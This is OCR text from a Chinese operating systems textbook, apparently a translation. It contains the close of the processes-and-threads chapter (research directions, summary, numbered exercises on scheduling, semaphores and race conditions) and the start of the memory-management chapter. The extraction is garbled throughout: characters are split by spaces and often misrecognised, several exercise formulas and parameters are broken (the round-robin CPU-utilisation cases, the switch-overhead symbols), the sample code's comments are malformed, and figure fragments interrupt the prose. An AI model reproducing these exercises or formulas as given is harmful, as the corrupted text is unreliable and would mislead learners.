目前 还 有 许多 研究 操作 系统 安全 问题 的 工作 。 大 量 事实 表明 ， 为 了 抵御 攻击 者 (偶尔 也 需要 防护 用 
户 自身 的 误 操 作 )， 用 户 需要 更 完善 的 保护 措施 。 一 种 方法 是 详细 地 跟踪 并 且说 慎 地 限制 操作 系统 中 的 
信息 流 (Giffin 等 人 ，2012 ) 。 

调度 问题 (包括 单 处 理 器 和 多 处 理 器 ) 也 是 研究 者 感 兴趣 的 课题 ， 一 些 正 在 研究 的 主题 包括 移动 设 
备 上 的 低能 耗 调度 (Yuan 和 Nahrstedt，2006) 、 超 线程 级 调度 (Bulpin 和 Pratt，2005) 和 偏 置 意识 调度 
(Koufaty，2010) 。 智 能 手机 上 的 计算 量 逐 渐 增 加 ， 而 其 电池 容量 又 十 分 有 限 ， 一 些 研究 者 提出 在 可 能 
的 时 候 将 进程 迁移 到 云 上 某 个 更 强大 的 服务 器 上 执行 (Gordon 等 人 ，2012)。 但 实际 系统 的 设计 者 很 少 
会 因为 没有 合适 的 线程 调度 算法 而 苦恼 , 所 以 这 似乎 是 一 个 由 研究 者 推动 而 不 是 由 需求 推动 的 研究 类 型 。 
总 而 言 之 ， 进 程 、 线 程 与 调度 已 经 不 再 是 研究 的 热点 ， 功 耗 管理 、 虚 拟 化 、 云 计算 和 安全 问题 成 为 了 新 
的 热点 主题 。 


2.7 小 结 

为 了 隐藏 中 断 的 影响 ， 操 作 系 统 提供 了 一 个 并 行 执行 串 行进 程 的 概念 模型 。 进 程 可 以 动态 地 创建 和 
终止 ， 每 个 进程 都 有 自己 的 地 址 空间 。 

对 于 某 些 应 用 而 言 ， 在 一 个 进程 中 使 用 多 个 线程 是 有 益 的 。 这 些 线程 被 独立 调度 并 且 有 独立 的 栈 ， 
但 是 在 一 个 进程 中 的 所 有 线程 共享 一 个 地 址 空间 。 线 程 可 以 在 用 户 态 实现 ， 也 可 以 在 内 核 态 实现 。 

进程 之 间 通 过 进程 间 通 信 原 语 来 交换 信息 ， 如 信号 量 、 管 程 和 消息 。 这 些 原 语 用 来 确保 不 会 有 两 个 
进程 同时 在 临界 区 中 ， 以 避免 出 现 混乱 。 一 个 进程 可 以 处 在 运行 、 就 绪 或 阻塞 状态 ， 当 该 进程 或 其 他 进 
程 执行 某 个 进程 间 通 信 原 语 时 ， 可 以 改变 其 状态 。 线 程 间 的 通信 也 类 似 。 

进程 间 通 信 原 语 可 以 用 来 解决 诸如 生产 者 一 消费 者 问题 、 哲 学 家 就 餐 问 题 、 读 者 一 写 者 问题 和 睡眠 
理发 师 问题 等 。 但 即便 有 了 这 些 原 语 ， 也 要 仔细 设计 才能 避免 出 错 和 死 锁 。 

目前 已 经 有 大 量 成 熟 的 调度 算法 。 一 些 算法 主要 用 于 批 处 理 系统 中 ， 如 最 短 作业 优先 调度 算法 。 其 
他 算法 在 批 处 理 系统 和 交互 式 系统 中 都 很 常见 ， 如 轮转 调度 、 优 先 级 调度 、 多 级 队列 调度 、 有 保证 调度 、 
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种 之 全 


彩票 调度 以 及 公平 分 享 调度 等 。 有 些 系统 清晰 地 分 离 了 调度 策略 和 调度 机 制 ， 使 用 户 可 以 配置 调度 


算法 。 
习题 


.图 2-2 中 给 出 了 三 个 进程 状态 。 理 论 上 ， 三 个 状 
态 之 间 可 以 有 六 种 转换 ， 每 个 状态 两 个 。 但 图 
中 只 给 出 了 四 种 转换 。 其 余 两 种 转换 是 否 可 能 
发 生 ? 

.假设 要 设计 一 种 先进 的 计算 机 体系 结构 ， 它 使 
用 硬件 代替 中 断 来 完成 进程 切换 。 进 程 切换 时 
CPU 需 要 哪些 信息 ? 请 描述 用 硬件 完成 进程 切 
换 的 工作 过 程 。 

.当代 计算 机 中 ， 为 什么 中 断 处 理 程序 至 少 有 一 
部 分 是 由 汇编 语言 编写 的 ? 

.中 断 或 系统 调用 把 控制 权 转 交 给 操作 系统 时 ， 
为 什么 通常 会 用 到 与 被 中 断 进程 的 栈 分 离 的 内 
核 栈 ? 

.一 个 计算 系统 的 内 存 有 足够 的 空间 容纳 5 个 程 
序 。 这 些 程序 有 一 半 的 时 间 处 于 等 待 10 的 空闲 
状态 。 请 问 CPU 时 间 浪 费 的 比例 是 多 少 ? 

.一 个 计算 机 的 RAM 有 4GB ， 其 中 操作 系统 占 
512MB。 所 有 进程 都 占 256MB (为 了 简化 计算 ) 
并 且 特 征 相同 。 要 使 CPU 利 用 率 达到 99%， 最 
大 IO 等 待 是 多 少 ? 

.如 果 多 个 作业 能 够 并 行 运行 ， 会 比 它们 顺序 执 
行 完 成 得 快 。 假 设 有 两 个 作业 同时 开始 执行 ， 
每 个 需要 20 分 钟 CPU 时 间 。 如 果 顺 序 执行 ， 那 
么 完成 最 后 一 个 作业 需要 多 长 时 间 ? 如 果 并 行 
执行 又 需要 多 长 时 间 ? 假设 IO 等 待 占 50% 。 

. 考虑 一 个 6 级 多 道 程序 系统 (内 存 中 可 同时 容纳 
6 个 程序 ) 。 假 设 每 个 进程 的 MO 等 待 占 40% ， 那 
么 CPU 利用 率 是 多 少 ? 

.假设 要 从 互联 网 上 下 载 一 个 2GB 大 小 的 文件 ， 
文件 内 容 可 从 一 组 镜像 服务 器 获得 ， 每 个 服务 
器 可 以 传输 文件 的 一 部 分 。 假 设 每 个 传输 请 求 
给 定 起 始 字 节 和 结束 字 节 。 如 何 用 多 线程 优化 
下 载 时 间 ? 

10. 为 什么 图 2-11a 的 模型 不 适用 于 在 内 存 中 使 用 
高 速 缓存 的 文件 服务 器 ? 每 个 进程 可 以 有 自己 
的 高 速 缓存 吗 ? 

. 当 一 个 多 线程 进程 创建 子 进程 时 ， 如 果子 进程 
复制 父 进程 的 所 有 线程 ， 就 会 出 现 问题 :假如 
父 进程 中 有 一 个 线程 正在 等 待 键盘 输入 ， 现 在 
就 有 两 个 线程 在 等 待 键盘 输入 ， 父 进程 和 子 进 
程 各 有 一 个 。 这 种 问题 在 单线 程 进 程 中 也 会 发 
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生 吗 ? 


12. 图 2-8 给 出 了 一 个 多 线程 Web 服 务 器 。 如 果 读 


取 文 件 只 能 使 用 阻塞 的 read 系 统 调用 ， 那 么 
Web 服 务 器 应 该 使 用 用 户 级 线程 还 是 内 核 级 线 
程 ? 为 什么 ? 


.在 本 章 中 ， 我 们 介绍 了 多 线程 Web 服 务 器 ， 说 


明 它 比 单线 程 服务 器 和 有 限 状态 机 服务 器 更 好 
的 原因 。 存 在 单线 程 服务 器 更 好 的 情形 吗 ? 请 
举例 。 


.既然 计算 机 中 只 有 一 套 寄存 器 ， 为 什么 图 2-12 


中 的 寄存 器 集合 是 按 每 个 线程 列 出 而 不 是 按 每 
个 进程 列 出 ? 


.在 没有 时 钟 中 断 的 系统 中 ， 一 个 线程 放弃 CPU 


后 可 能 再 也 不 会 获得 CPU 资源 ， 那 么 为 什么 线 
程 还 要 通过 调用 thread_yield 自 愿 放 弃 CPU? 


. 线程 可 以 被 时 钟 中 断 抢占 吗 ? 如 果 可 以 ， 在 什 


么 情形 下 可 以 ? 如 果 不 可 以 ， 为 什么 不 可 以 ? 


.请 对 使 用 单线 程 文件 服务 器 和 多 线程 文件 服务 


器 读 取 文 件 进行 比较 。 假 设 所 需 数据 都 在 块 高 
速 缓存 中 ， 获 得 工作 请 求 、 分 派 工作 并 完成 其 
他 必要 工作 需要 花费 12ms。 如 果 在 时 间 过 去 
1/3 时 ， 需 要 一 个 磁盘 操作 ， 额 外 花费 75ms， 
此 时 该 线程 进入 睡眠 。 单 线程 服务 器 每 秒 钟 可 
以 处 理 多 少 个 请 求 ? 多 线程 服务 器 呢 ? 


:在 用 户 态 实现 线程 的 最 大 优点 是 什么 ?最 大 缺 


点 是 什么 ? 


-图 2-15 中 ， 创 建 线程 和 线程 打印 消息 的 顺序 是 


随机 交错 的 。 有 没有 一 种 方法 可 以 严格 按照 以 
下 次 序 运行 : 创建 线程 1， 线 程 1 打印 消息 ， 线 
程 1 结束 ， 创建 线程 2， 线 程 2 打 印 消 息 ， 线 程 2 
结束 ; 依次 类 推 。 如 果 有 ， 请 说 明 方 法 ;如果 
没有 ， 请 解释 原因 。 


.在 讨论 线程 中 的 全 局 变量 时 ， 曾 使 用 过 程 


create_globe 将 存储 分 配给 指向 变量 的 指针 ， 
而 不 是 变量 自身 。 这 是 必需 的 吗 ? 还 是 直接 使 
用 变量 自身 也 可 行 ? 


. 考虑 一 个 线程 全 部 在 用 户 态 实现 的 系统 ， 该 运 


行 时 系统 每 秒 钟 获得 一 个 时 钟 中 断 。 当 某 个 线 
程 正在 该 运行 时 系统 中 执行 时 发 生 了 一 个 时 钟 
中 断 ， 此 时 会 出 现 什么 问题 ? 你 有 什么 解决 该 
问题 的 建议 吗 ? 


进程 与 线程 
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22. 假设 一 个 操作 系统 中 不 存在 类 似 于 select 的 
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系统 调用 来 提前 判断 从 文件 、 管 道 或 设备 中 
读 取 数 据 时 是 否 安全 ， 但 该 操作 系统 允许 设 
置 定 时 来 中 断 阻 塞 的 系统 调用 。 在 上 述 条 件 
下 ， 是 否 有 可 能 在 用 户 态 实现 一 个 线程 包 ? 
请 讨论 。 


.两 个 进程 在 一 个 共享 内 存 的 多 处 理 器 (两 个 


CPU) 上 运行 ， 当 它们 要 共享 一 块 内 存 时 ， 
图 2-23 中 使 用 turn 变 量 的 忙 等 待 解决 方案 还 有 
效 吗 ? 


.在 抢占 式 进程 调度 的 条 件 下 ， 图 2-24 中 互 斥 问 


题 的 Peterson 解 法 可 行 吗 ? 如 果 是 非 抢 占 式 调 
度 呢 ? 


.2.3.4 节 中 所 讨论 的 优先 级 反 转 问题 在 用 户 级 线 


程 中 是 否 可 能 发 生 ? 为 什么 ? 


.2.3.4 节 中 描述 了 一 种 有 高 优先 级 进程 H 和 低 优 


先 级 进程 L 的 情况 ， 导 致 了 H 陷 入 死 循 环 。 若 
采用 轮转 调度 算法 代替 优先 级 调度 算法 ， 还 会 
发 生 同 样 问题 吗 ? 请 讨论 。 


.在 使 用 线程 的 系统 中 ， 若 使 用 用 户 级 线程 ， 是 


每 个 线程 一 个 栈 还 是 每 个 进程 一 个 栈 ? 如 果 使 
用 内 核 级 线程 呢 ? 请 解释 。 


.在 开发 计算 机 时 ， 通 常 首 先 用 一 个 程序 模拟 执 


行 ,一 次 运行 一 条 指令 ， 多 处 理 器 也 严格 按 此 
模拟 。 在 这 种 没有 同时 事件 发 生 的 情形 下 ， 会 
出 现 竞 争 条 件 吗 ? 


.将 生产 者 一 消费 者 问题 扩展 成 一 个 多 生产 者 一 


多 消费 者 的 问题 ， 生 产 (消费 ) 者 都 写 〈 读 ) 
一 个 共享 的 缓冲 区 ， 每 个 生产 者 和 消费 者 都 在 
自己 的 线程 中 执行 。 图 2-28 中 使 用 信号 量 的 解 
法 在 这 个 系统 中 还 可 行 吗 ? 


.考虑 对 于 两 个 进程 P0 和 P1 的 互 斥 问题 的 解决 方 


案 。 假 设 变量 初始 值 为 0。P0 的 代码 如 下 : 
/* Other code*/ 


while(turn !=0){}/*Do nothing and wait/*/ 
Critical Section/*...*/ 

turn=0; 

/* Other code*/ 


P1 的 代码 是 将 上 述 代码 中 的 0 替换 为 1。 该 
方法 是 否 能 处 理 互 斥 问题 中 所 有 可 能 的 情形 ? 


:一 个 可 以 屏蔽 中 断 的 操作 系统 如 何 实现 信号 


量 ? 


32. 请 说 明 仅 通过 二 元 信号 量 和 普通 机 器 指令 如 何 


实现 计数 信号 量 〈 即 可 以 保持 一 个 任意 值 的 信 
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40. 


号 量 )。 


. 如 果 一 个 系统 只 有 两 个 进程 ， 可 以 使 用 一 个 屏 


障 来 同步 这 两 个 进程 吗 ? 为 什么 ? 


. 如 果 线 程 在 内 核 态 实现 ， 可 以 使 用 内 核 信号 量 


对 同一 个 进程 中 的 两 个 线程 进行 同步 吗 ? 如果 
线程 在 用 户 态 实 现 呢 ? 假设 其 他 进程 中 设 有 线 
程 需要 访问 该 信号 量 。 请 解释 你 的 答案 。 


. 管 程 的 同步 机 制 使 用 条 件 变量 和 两 个 特殊 操作 


wait 和 signal。 一 种 更 通用 的 同步 形式 是 只 用 
一 条 原 语 waituntil， 它 以 任意 的 布尔 谓词 作为 
参数 。 例 如 


waituntil x<0 or y+z<n 


这 样 就 不 再 需要 signal 原 语 。 很 显然 这 种 
方法 比 Hoare 或 Brinc Hansen 方 案 更 通用 ， 但 
它 从 未 被 采用 过 。 为 什么 ? (提示 : 请 考虑 其 
实现 。) 

一 个 快餐 店 有 四 类 雇员 : (1) 领班 ， 接 收 顾 客 
点 的 菜单 ; (2) EWM, ZRK: (3) 打包 
员 ， 将 饭菜 装 在 袋子 里 ， (4) 收银 员 ， 将 食 
品 袋 交 给 顾客 并 收 钱 。 每 个 雇员 可 被 看 作 一 个 
可 以 进行 通信 的 串 行进 程 ， 那 么 进程 间 通 信 模 
型 是 什么 ? 请 将 这 个 模型 与 UNIX 中 的 进程 联 
系 起 来 。 

假设 有 一 个 使 用 信箱 的 消息 传递 系统 ， 当 向 满 
信箱 发 消息 或 从 空 信箱 收 消息 时 ， 进 程 不 会 阻 
HE, 而 是 得 到 一 个 错误 代码 。 进 程 响 应 错误 代 
码 的 处 理 方式 是 不 断 地 重 试 ， 直 到 成 功 为 止 。 
这 种 方式 会 导致 竞争 条 件 吗 ? 


.CDC 6600 计 算 机 使 用 一 种 称 作 处 理 器 共享 的 


有 趣 的 轮转 调度 算法 ， 可 以 同时 处 理 多 达 10 个 
1/0 进 程 。 每 条 指令 结束 后 都 进行 进程 切换 ， 即 
进程 1 执行 指令 1, 进程 2 执行 指令 2, 以 此 类 推 。 
进程 切换 由 特殊 硬件 完成 ， 所 以 没有 开销 。 如 
果 在 没有 竞争 的 条 件 下 一 个 进程 需要 T 秒 钟 完 
成 ， 那么 当 有 n 个 进程 共享 处 理 器 时 完成 该 进 
程 需要 多 长 时 间 ? 
考虑 以 下 C 代 码 : 
void main() { 

fork(); 

fork(); 

exit(); 
} 
程序 执行 时 创建 了 多 少子 进程 ? 
Round-robin 调 度 算 法 一 般 需 要 维护 一 个 就 绪 
进程 列表 ， 每 个 进程 在 列表 中 只 出 现 一 次 。 如 
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果 某 个 进程 在 列表 中 出 现 两 次 会 发 生 什么 情 
况 ? 什么 情况 下 可 以 允许 多 次 出 现 ? 

41. 是 否 可 以 通过 分 析 源 代码 来 确定 进程 是 CPU 密 
集 型 的 还 是 IO 密集 型 的 ? 运行 时 如 何 确定 ? 
42. 请 说 明 在 Round-robin 调 度 算法 中 时 间 片 长 度 

和 上 下 文 切换 时 间 是 怎样 相互 影响 的 。 

43. 对 某 系 统 进行 监测 后 发 现 ， 在 阻塞 1/0 之 前 ， 
平均 每 个 进程 的 运行 时 间 为 T。 一 次 进程 切换 
需要 的 时 间 为 9S， 这 里 8 实际 上 就 是 开销 。 对 于 
采用 时 间 片 长 度 为 Q 的 轮转 调度 ， 请 给 出 以 下 
各 种 情况 的 CPU 利用 率 的 计算 公式 : 

(a) Q= = 
(b) O>T 
(c) S<0<T 
(d) Q=S 
(e) Q 趋 近 于 0 

44. 有 5 个 待 运行 作业 ， 估 计 它 们 的 运行 时 间 分 别 是 
9、6、3、5 和 X。 以 何 种 次 序 运行 这 些 作业 能 得 
到 最 短 的 平均 响应 时 间 ? (答案 将 依赖 于 X) 

45. 有 5 个 批 处 理 作业 A~E， 它 们 几乎 同时 到 达 一 
个 计算 中 心 。 估 计 它 们 的 运行 时 间 分 别 为 10、 
6、2、4 和 8 分 钟 。 其 优先 级 (由 外 部 设 定 ) 分 
别 为 3、5、2、1 和 4， 其 中 5 为 最 高 优先 级 。 对 
于 下 列 每 种 调度 算法 ， 计 算 其 平均 进程 周转 时 
间 ， 可 忽略 进程 切换 的 开销 。 

(a) 轮转 法 
(b) 优先 级 调度 
(c) 先 来 先 服务 (按照 0、6、2、4、8 次 序 运行 ) 
(d) 最 短 作 业 优 先 

对 于 (a), 假设 系统 具有 多 道 程序 处 理 能 力 ， 
每 个 作业 均 公平 共享 CPU 时 间 ， 对 于 (b) ~(d)， 
假设 任 一 时 刻 只 有 一 个 作业 运行 ， 直 到 结束 。 
所 有 的 作业 都 是 CPU 密集 型 作业 。 

46. 运行 在 CTSS 上 的 某 个 进程 需要 30 个 时 间 片 才 
能 完成 。 该 进程 必须 被 调和 人 多少 次 (包括 第 一 
次 ， 即 在 该 进程 运行 之 前 ) ? 

47. 一 个 实时 系统 有 2 个 周期 为 ms 的 电话 任务 ， 
每 次 任务 的 CPU 时 间 是 lms; 还 有 1 个 周期 为 
33ms 的 视频 流 ， 每 次 任务 的 CPU 时 间 是 11ms。 
这 个 系统 是 可 调度 的 吗 ? 

48. 在 上 一 道 题 中 ， 如 果 再 加 入 一 个 视频 流 ， 系 统 
还 是 可 调度 的 吗 ? 

49. 用 a = 1/2 的 老化 算法 来 预测 运行 时 间 。 先 前 
的 四 次 运行 ， 从 最 老 的 到 最 近 一 个 ， 其 运行 时 
间 分 别 是 40ms、20ms、40ms 和 15ms。 那 么 下 
一 次 的 预测 时 间 是 多 少 ? 
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50. 一 个 软 实时 系统 有 4 个 周期 时 间 ， 其 周期 分 别 
为 50ms、100ms、200ms 和 250ms。 假 设 这 4 个 
事件 分 别 需 要 35ms、20ms、10ms 和 x ms 的 CPU 
时 间 。 保 持 系 统 可 调度 的 最 大 x 值 是 多 少 ? 

.在 哲学 家 就 餐 问题 中 使 用 如 下 规则 : 编号 为 偶 

数 的 哲学 家 先 拿 他 左边 的 又 子 再 拿 他 右边 的 又 

子 ; 编号 为 奇数 的 哲学 家 先 拿 他 右边 的 又 子 再 

拿 他 左边 的 又 子 。 这 条 规则 是 否 能 避免 死 锁 ? 

.一 个 实时 系统 需要 处 理 两 个 语音 通信 ， 每 个 通 

新 都 是 6ms 运 行 一 次 ， 每 次 占用 lms CPU 时 间 ， 

加 上 25 帧 / 秒 的 一 个 视频 ， 每 一 帧 需要 20ms 的 

CPU 时 间 。 这 个 系统 是 可 调度 的 吗 ? 

53. 考虑 一 个 系统 ， 希 望 以 策略 与 机 制 分 离 的 方式 
实现 内 核 级 线程 调度 。 请 提出 一 个 解决 方案 。 
54. 在 哲学 家 就 餐 问 题 的 解法 (图 2-47) 中 ， 为 什 
么 在 过 程 take_forks 中 将 状态 变量 置 为 

HUNGRY? 

55. 考 虑 图 2-47 中 的 过 程 put_forks， 假 设 变量 
state[j] 在 对 test 的 两 次 调用 之 后 〈 而 不 是 之 前 ) 
才 被 置 为 THINKING ， 这 会 对 解法 有 什么 影 
响 ? 

56. 按照 哪 一 类 进程 何 时 开始 执行 ， 读 者 一 写 者 问 
题 可 以 有 几 种 方式 求解 。 请 详细 描述 该 问题 的 
三 种 变 体 ， 每 一 种 变 体 偏好 (或 不 偏好 ) 某 一 
类 进程 。 对 每 种 变 体 ， 请 指出 当 一 个 读者 或 写 
者 访问 数据 库 时 会 发 生 什 么 ， 以 及 当 一 个 进程 
结束 对 数据 库 的 访问 后 又 会 发 生 什么 ? 

57. 请 编写 一 个 shell 脚 本 ， 读 取 文 件 的 最 后 一 个 数 
字 ， 加 1 后 再 将 该 数字 追加 在 该 文件 上 ， 从 而 
生成 顺序 数 文件 。 在 后 台 和 前 台 分 别 运行 该 脚 
本 的 一 个 实例 ， 每 个 实例 访问 相同 的 文件 。 需 
要 多 长 时 间 才 会 出 现 竞争 条 件 ? 临界 区 是 什 
么 ? 请 修改 该 脚本 以 避免 竞争 。( 提 示 : 使 用 
In file file.lock 锁 住 数据 文件 。) 

58. 假设 有 一 个 提供 信号 量 的 操作 系统 。 请 实现 一 
个 消息 系统 ， 编 写 发 送 和 接收 消息 的 过 程 。 

59. 使 用 管 程 代替 信号 量 来 解决 哲学 家 就 餐 问 题 。 

60. 假设 某 大 学 准备 把 美国 最 高 法 院 的 信条 “平等 
但 隔离 其 本 身 就 是 不 平等 ”(Separate but equal 
is inherently unequal) 既 运用 在 种 族 上 也 运用 
在 性 别 上 ， 从 而 结束 校园 内 长 期 使 用 的 浴室 按 
性 别 隔离 的 做 法 。 但 是 ， 为 了 迁就 传统 习惯 ， 
学 校 颁布 法 令 : 当 有 一 个 女生 在 浴室 里 时 ， 其 
他 女生 可 以 进入 ， 但 是 男生 不 行 ， 反 之 亦 然 。 
在 每 个 浴室 的 门 上 有 一 个 滑动 标记 ， 表 示 当 前 
处 于 以 下 三 种 可 能 状态 之 一 : 
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一 


5 


N 


0 


61. 


62. 


63. 


进程 与 线程 


。 空 

。 有 女生 

。 有 男生 

用 你 喜欢 的 程序 设计 语言 编写 下 面 的 过 程 : 
woman_wants_to_enter, man_wants_to_enter, 
woman_leaves，man_leaves。 可 以 随意 使 用 计 
数 器 和 同步 技术 。 

重 写 图 2-23 中 的 程序 ， 使 它 可 以 处 理 两 个 以 上 
的 进程 。 

编写 一 个 使 用 线程 实现 的 共享 一 个 公共 缓冲 区 
的 生产 者 一 消费 者 问题 。 但 是 ， 不 要 使 用 信号 
量 或 任何 其 他 用 来 保护 共享 数据 结构 的 同步 原 
语 。 直 接 让 每 个 线程 在 需要 访问 缓冲 区 时 就 立 
即 访问 。 使 用 sleep 和 wakeup 来 处 理 缓 冲 区 满 
和 空 的 条 件 。 观 察 需要 多 长 时 间 会 出 现 严重 的 
竞争 条 件 。 例 如 ， 可 以 让 生产 者 一 次 打印 一 个 
数字 ， 每 分 钟 打印 不 超过 一 个 数字 ， 因 为 /O 
会 影响 竞争 条 件 。 

一 个 进程 可 以 通过 在 Round-robin 算 法 的 队列 
中 多 次 出 现 ， 从 而 提高 优先 级 。 在 数据 池 的 不 
同 区 域 运行 多 个 程序 实例 也 能 达到 同样 的 效 
果 。 先 写 一 个 程序 测试 一 组 数 是 否 为 素数 ， 然 
后 想 办 法 让 多 个 程序 实例 能 同时 执行 ， 并 且 保 
证 两 个 不 同 的 程序 实例 不 会 测试 同一 个 数 。 这 
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样 做 是 否 真 的 能 更 快 地 完成 任务 ? 注意 这 个 结 
论 与 计算 机 中 正在 执行 的 别 的 任务 有 关 : 如 果 
计算 机 只 执行 了 该 程序 的 实例 ， 则 不 会 有 性 能 
提升 ， 但 是 如 果 系 统 中 还 有 别 的 进程 ， 该 程序 
应 该 能 得 到 更 多 的 使 用 CPU 的 机 会 。 


.实现 一 个 多 线程 程序 测试 一 个 数 是 否 是 完全 


数 。 如 果 一 个 数 N 的 所 有 因数 (不 包括 N 本 身 ) 
的 和 还 是 N， 则 N 是 一 个 完全 数 。 如 6 和 28。 输 
和 是 一 个 整数 N， 如 果 N 是 完全 数 则 输出 true， 
否则 输出 false。 主 程序 从 命令 行 中 读 取 数 字 N 
和 PP， 创建 P 个 线程 ， 将 1~N 这 N 个 数 分 给 各 个 
线程 ， 保 证 两 个 线程 不 会 分 到 相同 的 数 。 每 个 
线程 判断 这 些 数 是 否 是 N 的 因数 ， 如 果 是 ， 则 
将 该 数 存 人 一 个 共享 的 缓冲 区 中 。 在 父 进程 中 
用 合适 的 同步 方法 , 等 待 所 有 线程 执行 完毕 后 ， 
判断 N 是 否 是 完全 数 ， 即 判断 是 否 N 的 所 有 因 
数 之 和 还 是 N。( 提 示 : 你 可 以 将 测试 的 数 限 
制 在 1 至 N 的 平方 根来 加 速 计算 过 程 。) 


.实现 一 个 统计 文本 文件 中 单词 频率 的 程序 。 将 


文本 文件 分 为 N 段 ， 每 段 交 由 一 个 独立 的 线程 
处 理 ， 线 程 统计 该 段 中 单词 的 频率 。 主 进程 等 
待 所 有 线程 执行 完毕 后 ， 通 过 各 线程 的 输出 结 
果 来 统计 整体 的 单词 频率 。 
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内 存 管 理 





内 存 (RAM) 是 计算 机 中 一 种 需要 认真 管理 的 重要 资源 。 就 目前 来 说 ， 虽 然 一 台 普 通 家 用 计算 机 的 
存储 容量 已 经 是 20 世 纪 60 年 代 早 期 全 球 最 大 的 计算 机 IBM 7094 的 存储 容量 的 10 000 倍 以 上 ， 但 是 程序 大 
小 的 增长 速度 比 内存 容 量 的 增长 速度 要 快 得 多 。 正 如 帕 金 森 定 律 所 指出 的 :“ 不 管 存 储 器 有 多 大 ， 程 序 都 
可 以 把 它 填 满 ”在 这 一 章 中 ， 我 们 将 讨论 操作 系统 是 怎样 对 存储 器 创建 抽象 模型 以 及 怎样 管理 它们 的 。 

每 个 程序 员 都 梦想 拥有 这 样 的 存储 器 : 它 是 私有 的 、 容 量 无 限 大 的 、 速 度 无 限 快 的 ， 并 且 是 永久 性 
的 〈 即 断 电 时 不 会 丢失 数据 ) 。 当 我 们 期 望 这 样 的 存储 器 时 ， 何 不 进一步 要 求 它 价格 低廉 呢 ? 遗憾 的 是 ， 
目前 的 技术 还 不 能 为 我 们 提供 这 样 的 存储 器 。 也 许 你 会 有 解决 方案 。 

除 此 之 外 的 选择 是 什么 呢 ? 经 过 多 年 探索 ， 人 们 提出 了 分 层 存 储 器 体系 (memory hierarchy) 的 概 
念 ， 即 在 这 个 体系 中 ， 计 算 机 有 若干 净 (MB) 快速 、 昂 贵 且 易 失 性 的 高 速 缓 存 (cache)， 数 千 净 (GB) 
速度 与 价格 适中 且 同 样 易 失 性 的 内 存 ， 以 及 几 兆 兆 (TB) 低速 、 廉 价 、 非 易 失 性 的 磁盘 存储 ， 另 外 还 
有 诸如 DVD 和 USB 等 可 移动 存储 装置 。 操 作 系 统 的 工作 是 将 这 个 存储 体系 抽象 为 一 个 有 用 的 模型 并 管理 
这 个 抽象 模型 。 

操作 系统 中 管理 分 层 存储 器 体系 的 部 分 称 为 存储 管理 器 (memory manager)。 它 的 任务 是 有 效 地 管 
理 内 存 ， 即 记录 哪些 内 存 是 正在 使 用 的 ， 哪 些 内 存 是 空闲 的 ， 在 进程 需要 时 为 其 分 配 内 存 ， 在 进程 使 用 
完 后 释放 内 存 。 

本 章 我 们 会 研究 几 个 不 同 的 存储 管理 方案 ， 涵 盖 非 常 简单 的 方案 到 高 度 复杂 的 方案 。 由 于 最 底层 的 
高 速 缓存 的 管理 由 硬件 来 完成 ， 本 章 将 集中 介绍 针对 编程 人 员 的 内 存 模型 ， 以 及 怎样 优化 管理 内 存 。 至 
于 永久 性 存储 器 一 一 磁盘 一 一 的 抽象 和 管理 , 则 是 下 一 章 的 主题 。 我 们 会 从 最 简单 的 管理 方案 开始 讨论 ， 
并 逐步 深入 到 更 为 续 密 的 方案 。 


3.1 无 存储 器 抽象 


最 简单 的 存储 器 抽象 就 是 根本 没有 抽象 。 早 期 大 型 计算 机 (20 世 纪 60 年 代 之 前 )、 小 型 计算 机 (20 
世纪 70 年 代 之 前 ) 和 个 人 计算 机 (20 世纪 80 年 代 之 前 ) 都 没有 存储 器 抽象 。 每 一 个 程序 都 直接 访问 物理 
内 存 。 当 一 个 程序 执行 如 下 指令 : 

MOV REGISTER1, 1000 


计算 机 会 将 位 置 为 1000 的 物理 内 存 中 的 内 容 移 到 REGISTER1 中 。 因 此 ， 那 时 呈现 给 编程 人 员 的 存储 器 
模型 就 是 简单 的 物理 内 存 : 从 0 到 某 个 上 限 的 地 址 集合 ， 每 一 个 地 址 对 应 一 个 可 容纳 一 定数 目 二 进 制 位 
的 存储 单元 ， 通 常 是 8 个 。 

在 这 种 情况 下 ， 要 想 在 内 存 中 同时 运行 两 个 程序 是 不 可 能 的 。 如 果 第 一 个 程序 在 2000 的 位 置 写 入 一 
个 新 的 值 ， 将 会 擦 掉 第 二 个 程序 存放 在 相同 位 置 上 的 所 有 内 容 ， 所 以 同时 运行 两 个 程序 是 根本 行 不 通 的 ， 
这 两 个 程序 会 立刻 崩溃 。 

不 过 即使 存储 器 模型 就 是 物理 内 存 ， 还 是 存在 一 些 可 行 选项 的 。 图 3-1 展 示 了 三 种 变 体 。 在 图 3-1a 
中 ， 操 作 系统 位 于 RAM (随机 访问 存储 器 ) 的 底部 ， 在 图 3-1b 中 ， 操 作 系 统 位 于 内 存 顶 端的 ROM (只 
读 存储 器 ) 中 ， 而 在 图 3-1c 中 ， 设 备 驱动 程序 位 于 内 存 顶 端的 ROM 中 ， 而 操作 系统 的 其 他 部 分 则 位 于 下 
面 的 RAM 的 底部 。 第 一 种 方案 以 前 被 用 在 大 型 机 和 小 型 计算 机 上 ， 现 在 很 少 使 用 了 。 第 二 种 方案 被 用 
在 一 些 掌上 电脑 和 伐 入 式 系统 中 。 第 三 种 方案 用 于 早期 的 个 人 计算 机 中 〈 例 如 运行 MS-DOS 的 计算 机 )， 
在 ROM 中 的 系统 部 分 称 为 BIOS (Basic Input Output System， 基 本 输入 输出 系统 )。 第 一 种 方案 和 第 三 
种 方案 的 缺点 是 用 户 程序 出 现 的 错误 可 能 摧毁 操作 系统 ， 引 发 灾难 性 后 果 。 

当 按 这 种 方式 组 织 系统 时 ， 通 常 同一 个 时 刻 只 能 有 一 个 进程 在 运行 。 一 旦 用 户 键入 了 一 个 命令 ， 操 
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作 系 统 就 把 需要 的 程序 从 磁盘 复制 到 内 存 中 并 执行 ， 当 进程 运行 结束 后 ， 操 作 系 统 在 用 户 终端 显示 提示 
符 并 等 待 新 的 命令 。 收 到 新 的 命令 后 ， 它 把 新 的 程序 装 和 内存， 覆盖 前 一 个 程序 。 


OxFFF ... 


位 于 ROM 中 
的 操作 系统 





c) 
图 3-1 在 只 有 操作 系统 和 一 个 用 户 进程 的 情形 下 ， 组 织 内 存 的 三 种 简单 方案 (当然 也 存在 其 他 方案 ) 


在 没有 存储 器 抽象 的 系统 中 实现 并 行 的 一 种 方法 是 使 用 多 线程 来 编程 。 由 于 在 引入 线程 时 就 假设 一 
个 进程 中 的 所 有 线程 对 同一 内 存 映像 都 可 见 ， 那 么 实现 并 行 也 就 不 是 问题 了。 虽然 这 个 想法 行 得 通 ， 但 
